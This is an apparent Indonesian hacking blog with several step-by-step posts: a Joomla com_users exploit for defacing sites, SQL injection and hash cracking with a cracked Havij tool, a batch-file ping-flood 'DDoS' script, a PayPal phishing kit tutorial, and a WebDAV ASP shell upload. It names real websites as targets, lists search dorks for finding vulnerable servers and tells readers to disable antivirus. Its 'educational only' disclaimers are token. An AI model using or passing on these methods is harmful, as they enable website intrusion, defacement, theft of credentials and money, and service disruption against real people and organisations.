Tuesday, March 25, 2014

Cara Deface Dengan Teknik Exploit Joomla | Com_User

Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p


Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: Lihat

2. Titip Nama : Indonesian Cyber Army 

UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...

Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User 

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Lain:
inurl:index.php/­using-joomla/­extensions/plugins
inurl:index.php/­using/joomla 
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-category-list­/50-upgraders
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­28-park-site/­photo-gallery
inurl:index.php/­using-joomla/­parameters/­26-sample-data-articl­es/park-
Inurl:index.php/­plugins 
Inurl:index.php/­rss=feed 
inurl:index.php/­joomla/content/­category-blog/­24-joomla 
inurl:index.php/­using-joomla/­extensions/­components/­content-component/­article-categories/­84-gd-articles 
inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management 
inurl:index.php/­using-joomla/­extension/components/­content-component/­article-category-list­/50-upgraders intext:joomla! 1.7 - open source content management
inurl:index.php/­19-sample-data-articl­es/joomla/­50-upgraders site:id inurl:index.php/­using-joomla/­extensions/templates/­beez-2/­home-page-beez-2 
inurl:index.php/­19-sample-data-articl­es/joomla
inurl:Home Page Beez5 joomla 1.6 index.php/­using-joomla/­extensions/­components/­users-component/­registration-form

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration


5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:


6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

udah gitu aja! Salam........ :p
Posted by at No comments:

Cara Hack Website Dengan Havij Pro 1.15

1.) Jalankan software  Havij Pro 1.15 nya

2. Download dork di SINI. lalu copy paste ke google [bebas yang mana saja] 

3.Contoh disini saya ambil target : http://beeindia.in/content.php?page=schemes/schemes.php?id=1 . Untuk menentukan website tsb vuln atau tidak, kita beri karakter ' di url terakhir menjadi http://beeindia.in/content.php?page=schemes/schemes.php?id=1'
[Vulnerability bisa berupa tulisan error pada syntax dan bisa berupa tampilan yang berbeda dari sebelumnya]

4.Kita masukkan target tersebut kedalam kolom target No 1, 
terus lihat dilangkah No 2, terlihatkan nama databasenya, 
kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5. Setelah sobat klik, maka tampilannya akan seperti dibawah ini. 
Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.


6. Akan ada banyak sekali table-table yang terbuka. 
Terus ayo kita tebak dimana letak admin & passwordnya berada. 
Saya menebak kalo user dan passwordnya ada ditableweb_users
Okelah, kita coba table tersebut, 
kita liat isinya dengan hanya mengklikGetColoums yang terletak disebelah Get Tables 
 yang saya tandai dengan No 2.


7. Selanjutnya tinggal sobat centang data yang ingin di ambil. 
Saya tandai dengan No 1, lalu klik Get Data
Kemudian kita tunggu sampai selesai.


8. Sudah Kelihatan kan user sama passwordnya, yang masih terenkripsi dengan MD5. Cara mengenkripsinya mudah saja, karena software ini juga menyediakan fitur enkripsi untuk MD5.


9. Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLEatau sobat bisa juga mencari admin page finder

10.Jika Sudah Menemukan Password Dalam Bentuk Angka atau Sering Disebut Password MD5 Maka  Kita Pecahkan Password Tersebut dalam Bentuk Password asli
Kalian Klik Password MD5 Yang Ada Di Havij Pro Yang Kita Temukan Tadi 
Lalu Klik Kanan Lalu Copy..
Klik Menu MD5 Yang Ada DiHavij Pro 
Lalu Pastekan DiKotak 
Lalu Klik ANALYZE 
Maka nanti Web Khusus pemecah MD5 Itu Akan Bekerja dan Menemukan Passwordnya...
Maka Akan Muncul Tuh Passwordnya Di Kotak..

11.Kalau Sudah ketemu Username Dan Password WEBSITE di Menu Havij 
Maka Kita Tinggal Cari Menu Login Adminnya..
Klik Menu di Havij Find Admin 
Lalu Masukan URL Target Yang Kita Temukan Username Dan Password Tadi 
Lalu Klik Analyze 
Maka Akan Muncul URL Untuk Login....

Mudah sekali bukan ???
Jika Tertarik Download Havij Pro DISINI 

Buka Dan Ikutin Caranya
Sebelum Menggunakan Havij Pro 1.15 ini, Register Dulu Dengan Cara\Buka Menu Havij Pro
Lalu Klik Register
Tulis Nama DiKolom Dengan Nama
-Cracked@By.Exidous
-Lalu Di Bawahnya Disuruh Masukan File Maka Cari File Yang Ada Di Havij Tadi Namanya HavijKey.lic Lalu Register Dan Selamat Havij Anda Sudah Full Version

Ingat Cara Hack Website Dengan Havij Pro 1.15
Ini hanya untuk pengetahuan dan pembelajaran, Semua yang Sobat lakukan adalah tanggung jawab anda sendiri.

Posted by at No comments:
Labels:

Cara Menyerang Website Dengan DDoS Menggunakan CMD

Ok Gan Kali Ini Saya Akan Share Cara Menyerang Website Dengan DDoS Menggunakan CMD
Ok dah Langsung Sedot Aja Gan
Pertama Buat Script Notepad Dulu Gan
dengan cara
1.Klik Star
2.Ketik Notepad Di Kotak Search program and file dan buka program notepad
3.lalu copy script dibawah ini dan pastekan di Notepad

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          DDoS Attack         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : Hecker Mahfud             +
echo + Visite : Cyberfighter-bengkulu.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / URL Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

 4.Simpan File Dengan Nama ddos.bat lalu Format File All File
5.Buka Cmd Dengan Cara Klik Star Lalu ketik cmd di Kotak search program and file
dan buka program cmd 
6.Ketik Di CMD ddos.bat 
7.ketik URL/IP Website Target Klik Enter
 8.Lalu Muncul Seperti Screen shot Dibawah Ini,.. Tulis Ip Yang ada Di atas dan Tulis Jumlah
paket lalu klik enter

 9.dan muncul kotak screenshot dibawah ini




10.Tunggu hingga selesai dan selamat anda telah menyerang website tersebut..
hehehe


Ok Deh Sekian Dulu Tentang Cara Menyerang Website Dengan DDoS Menggunakan CMD
Posted by at No comments:
Labels:

CARA HACK AKUN PayPAL

Ini adalah  tutorial tentang hacking PayPal dan kedua Black Hacking hacking tutorial setelah Credit Card. 

Tutorial ini ditulis oleh teman saya 

Catatan: Hacking kartu kredit atau rekening Bank seperti PayPal adalah tindakan ilegal, ini hanya posting informasi dan saya tidak bertanggung jawab atas tindakan yang dilakukan oleh Anda setelah membaca tutorial ini. Posting ini adalah untuk tujuan pendidikan saja. 

Jadi, untuk metode pertama tentang hacking PayPal, aku akan menggunakan phishing. Phishing adalah salah satu cara termudah untuk hack APAPUN situs nama pengguna dan password. Anda meng-upload Webpage palsu yang tampak seperti yang legit, maka Anda mengirimkan link untuk korban anda dan trik dia ke memasuki informasi login-nya ke Webpage palsu, yang kemudian mengirimkan informasi kepada Anda. Ini sangat sederhana dan sangat efektif. 

Membuat Halaman Login Palsu
1. Download PayPal phisher dari KLIK DISINI
2. Kemudian ekstrak file didownload menggunakan WinRAR, file yang didownload berisi:

     * index.html
     * login.php


3. Sekarang upload dua file ke salah satu web hosting gratis situs-situs seperti:

     * http://www.yourfreehosting.net/
     * http://www.t35.com/
     * http://www.drivehq.com/
     * http://www.110mb.com
     * http://www.esmartstart.com/


4. Setelah itu, kirim link ini phisher (index.html) untuk korban anda dan membuatnya login ke Account PayPalnya menggunakan phisher dikirim.

5. Begitu dia log in ke / nya Account PayPal dia menggunakan phisher, semua nya diketik PayPal ID danPassword disimpan di "passes.txt". File ini dibuat dalam control panel hosting Anda.

5. Sekarang, file passes.txt terbuka untuk mendapatkan hacked PayPal ID dan Password. Jika Anda tidakmendapatkan passes.txt, coba menyegarkan halaman Anda. Setelah Anda mendapatkan passes.txt, Andamendapatkan PayPal Username dan Password dan dengan mudah dapat menggunakannya untuk hackingAccount PayPal.

Thats it. Saya harap tutorial ini phishing adalah fullproof dan sekarang Anda bisa hack password AccountPayPal menggunakan Phishing PayPal.
Posted by at No comments:
Labels:

Cara Devace Dengan Webdav Shell Maker

Label: 
Asalamuallaikum Sahabat Blogger Semua..
Pada Kesempatan Hari Ini Saya Akan Share Cara DEVACE dengan Tools Yaitu Webdav Shell Maker Buatan Seorang Defacer Tops Indonesia Yaitu Hmei7

Dork WebDav : inurl:/Hmei7.asp;.txt site:com

    intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache”
    intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache” site:edu
    intitle:”index.of” intext:”(Win32) DAV/2? intext:”Apache” site:gov
    intitle:”index.of”
    inurl:webdavintext:”(Win32) DAV/2? intext:”Apache” site:YOURCOUNTRY (misal: my, us,       th. dll)
    inurl:.com.x/*.asp
    inurl:.edu.x/*.asp
    inurl:.gov.x/*.asp
    inurl:.net.x/*.asp
    inurl:.org.x/*.asp
Apa Itu Deface?
Deface Adalah Mengganti/Merubah Tampilan Utama Suatu Halaman Website Dan Mengganti Tampilan Nya Menjadi Tampilan Yang Kita Inginkan......

Berikut Tutor Cara Menggunakannya...

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Download Disini

Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..
2. Pilih WebDav >> ASP Shell Maker
3. Terus Klik Add Site >> Masukkan Website Target
4. Bila Berhasil akan ada penampakan seperti ini:
5. Terus hasilnya copas Dan Lihat Hasilnya.
Itu Lah Hasil Shell Yang Anda Tanam Di Website Tersebut
Sekarang Tinggal Tebas Index.htmlnya..

Ok Sekian Tutorialnya Semoga Bermamfaat
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)